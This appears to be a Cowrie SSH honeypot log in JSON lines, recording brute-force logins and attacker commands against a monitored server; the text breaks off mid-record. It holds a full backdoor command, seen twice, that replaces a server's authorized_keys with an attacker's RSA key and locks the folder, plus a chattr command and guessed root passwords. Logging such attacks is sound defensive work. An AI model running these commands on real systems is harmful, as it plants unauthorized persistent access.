{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:20:41.942321Z","src_ip":"139.59.14.27","session":"e52e79b433cc"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:20:42.282272Z","src_ip":"139.59.14.27","session":"e52e79b433cc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:20:42.283328Z","src_ip":"139.59.14.27","session":"e52e79b433cc"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":42730,"dst_ip":"1.2.3.4","dst_port":22,"session":"9f2156050406","protocol":"ssh","message":"New connection: 139.59.14.27:42730 (1.2.3.4:22) [session: 9f2156050406]","sensor":"my-vps","timestamp":"2025-09-08T13:20:42.665708Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:20:42.666694Z","src_ip":"139.59.14.27","session":"9f2156050406"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:20:43.024827Z","src_ip":"139.59.14.27","session":"9f2156050406"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:20:43.109933Z","src_ip":"134.199.174.250","session":"8c26d0db86dd"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:20:44.469134Z","src_ip":"139.59.14.27","session":"9f2156050406"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:20:45.837629Z","src_ip":"139.59.14.27","session":"9f2156050406"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":42736,"dst_ip":"1.2.3.4","dst_port":22,"session":"baa9ab901261","protocol":"ssh","message":"New connection: 139.59.14.27:42736 (1.2.3.4:22) [session: baa9ab901261]","sensor":"my-vps","timestamp":"2025-09-08T13:20:46.141748Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:20:46.142644Z","src_ip":"139.59.14.27","session":"baa9ab901261"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:20:46.462386Z","src_ip":"139.59.14.27","session":"baa9ab901261"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:20:47.782422Z","src_ip":"139.59.14.27","session":"baa9ab901261"}
{"eventid":"cowrie.session.closed","duration":"9.6","message":"Connection lost after 9.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:20:48.097827Z","src_ip":"139.59.14.27","session":"e52e79b433cc"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:20:48.105120Z","src_ip":"139.59.14.27","session":"baa9ab901261"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":56986,"dst_ip":"1.2.3.4","dst_port":22,"session":"590b81c9202c","protocol":"ssh","message":"New connection: 134.199.174.250:56986 (1.2.3.4:22) [session: 590b81c9202c]","sensor":"my-vps","timestamp":"2025-09-08T13:21:09.936777Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:21:09.938029Z","src_ip":"134.199.174.250","session":"590b81c9202c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:21:10.245552Z","src_ip":"134.199.174.250","session":"590b81c9202c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":16873,"dst_ip":"1.2.3.4","dst_port":22,"session":"51db154d0ab3","protocol":"ssh","message":"New connection: 212.227.235.229:16873 (1.2.3.4:22) [session: 51db154d0ab3]","sensor":"my-vps","timestamp":"2025-09-08T13:21:10.283884Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:21:10.284825Z","src_ip":"212.227.235.229","session":"51db154d0ab3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:21:10.607579Z","src_ip":"212.227.235.229","session":"51db154d0ab3"}
{"eventid":"cowrie.session.connect","src_ip":"43.134.41.225","src_port":33332,"dst_ip":"1.2.3.4","dst_port":22,"session":"347bba13f4b4","protocol":"ssh","message":"New connection: 43.134.41.225:33332 (1.2.3.4:22) [session: 347bba13f4b4]","sensor":"my-vps","timestamp":"2025-09-08T13:21:10.964193Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:21:10.964777Z","src_ip":"43.134.41.225","session":"347bba13f4b4"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-09-08T13:21:11.227294Z","src_ip":"43.134.41.225","session":"347bba13f4b4"}
{"eventid":"cowrie.login.failed","username":"usertest","password":"changeme","message":"login attempt [usertest/changeme] failed","sensor":"my-vps","timestamp":"2025-09-08T13:21:11.250985Z","src_ip":"212.227.235.229","session":"51db154d0ab3"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"123abc","message":"login attempt [oracle/123abc] failed","sensor":"my-vps","timestamp":"2025-09-08T13:21:11.261716Z","src_ip":"134.199.174.250","session":"590b81c9202c"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":59136,"dst_ip":"1.2.3.4","dst_port":22,"session":"4292c49d46f1","protocol":"ssh","message":"New connection: 217.72.205.35:59136 (1.2.3.4:22) [session: 4292c49d46f1]","sensor":"my-vps","timestamp":"2025-09-08T13:21:11.365455Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:21:11.366636Z","src_ip":"217.72.205.35","session":"4292c49d46f1"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:21:12.561095Z","src_ip":"134.199.174.250","session":"590b81c9202c"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:21:12.567442Z","src_ip":"212.227.235.229","session":"51db154d0ab3"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:21:18.964417Z","src_ip":"43.134.41.225","session":"347bba13f4b4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56610,"dst_ip":"1.2.3.4","dst_port":22,"session":"9bef1152081f","protocol":"ssh","message":"New connection: 212.227.235.229:56610 (1.2.3.4:22) [session: 9bef1152081f]","sensor":"my-vps","timestamp":"2025-09-08T13:21:21.240577Z"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:21:22.160020Z","src_ip":"212.227.235.229","session":"9bef1152081f"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":12144,"dst_ip":"1.2.3.4","dst_port":22,"session":"e5f49d7557c5","protocol":"ssh","message":"New connection: 49.247.35.31:12144 (1.2.3.4:22) [session: e5f49d7557c5]","sensor":"my-vps","timestamp":"2025-09-08T13:21:35.413929Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:21:35.421393Z","src_ip":"49.247.35.31","session":"e5f49d7557c5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:21:35.673852Z","src_ip":"49.247.35.31","session":"e5f49d7557c5"}
{"eventid":"cowrie.login.success","username":"root","password":"zxcmnb","message":"login attempt [root/zxcmnb] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:21:36.664223Z","src_ip":"49.247.35.31","session":"e5f49d7557c5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:21:37.197064Z","src_ip":"49.247.35.31","session":"e5f49d7557c5"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:21:37.197801Z","src_ip":"49.247.35.31","session":"e5f49d7557c5"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:21:37.198778Z","src_ip":"49.247.35.31","session":"e5f49d7557c5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:21:37.458583Z","src_ip":"49.247.35.31","session":"e5f49d7557c5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:21:38.069194Z","src_ip":"49.247.35.31","session":"e5f49d7557c5"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:21:38.069879Z","src_ip":"49.247.35.31","session":"e5f49d7557c5"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:21:38.323824Z","src_ip":"49.247.35.31","session":"e5f49d7557c5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:21:38.324732Z","src_ip":"49.247.35.31","session":"e5f49d7557c5"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":5408,"dst_ip":"1.2.3.4","dst_port":22,"session":"297655d23e57","protocol":"ssh","message":"New connection: 49.247.35.31:5408 (1.2.3.4:22) [session: 297655d23e57]","sensor":"my-vps","timestamp":"2025-09-08T13:21:38.593666Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:21:38.602754Z","src_ip":"49.247.35.31","session":"297655d23e57"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":55398,"dst_ip":"1.2.3.4","dst_port":22,"session":"7972c18a9f6c","protocol":"ssh","message":"New connection: 134.199.174.250:55398 (1.2.3.4:22) [session: 7972c18a9f6c]","sensor":"my-vps","timestamp":"2025-09-08T13:21:38.643349Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:21:38.644011Z","src_ip":"134.199.174.250","session":"7972c18a9f6c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58228,"dst_ip":"1.2.3.4","dst_port":22,"session":"e9792f5fd28a","protocol":"ssh","message":"New connection: 212.227.235.229:58228 (1.2.3.4:22) [session: e9792f5fd28a]","sensor":"my-vps","timestamp":"2025-09-08T13:21:38.685724Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:21:38.686652Z","src_ip":"212.227.235.229","session":"e9792f5fd28a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 